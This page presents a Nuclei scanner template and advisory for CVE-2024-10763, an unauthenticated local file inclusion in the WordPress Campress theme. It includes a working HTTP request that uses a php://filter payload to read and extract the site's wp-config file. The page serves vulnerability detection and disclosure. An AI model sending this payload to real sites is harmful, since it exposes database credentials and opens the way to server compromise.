WordPress Campress Theme <= 1.35 - Unauthenticated Local File Inclusion
CVE-2024-10763
Verified
Description
Campress theme for WordPress up to 1.35 contains a local file inclusion caused by 'campress_woocommerce_get_ajax_products' function, letting unauthenticated attackers include and execute arbitrary PHP files, exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
4%
Published Date
May 7, 2026
Template Author
pussycat0x
CVE-2024-10763.yaml
id: CVE-2024-10763
info:
name: WordPress Campress Theme <= 1.35 - Unauthenticated Local File Inclusion
author: pussycat0x
severity: critical
description: |
Campress theme for WordPress up to 1.35 contains a local file inclusion caused by 'campress_woocommerce_get_ajax_products' function, letting unauthenticated attackers include and execute arbitrary PHP files, exploit requires no authentication.
impact: |
Attackers can include and execute arbitrary PHP files, leading to remote code execution and potential full server compromise.
remediation:
Update to the latest version beyond 1.35.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/campress/campress-135-unauthenticated-local-file-inclusion
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10763
epss-score: 0.03593
epss-percentile: 0.88148
cwe-id: CWE-98
metadata:
verified: true
max-request: 1
tags: cve,cve2024,wordpress,wp-theme,campress,lfi,unauth
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=campress_woocommerce_get_ajax_products&layout=php://filter/convert.base64-encode/resource=/var/www/html/wp-config
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ZGVmaW5l"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 0
regex:
- '[A-Za-z0-9+/]{50,}={0,2}'
# digest: 490a0046304402204bf6e1ae8d421130b2087aa7a9a0060703a0771973bbe08281316b3cef945a4902201cee733078d4021a4010fd38aef19d078e84bf79f78d4773cd1dcc47a4a27d2a:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2024-10763
CWE ID:
cwe-98
Remediation Steps
Update to the latest version beyond 1.35.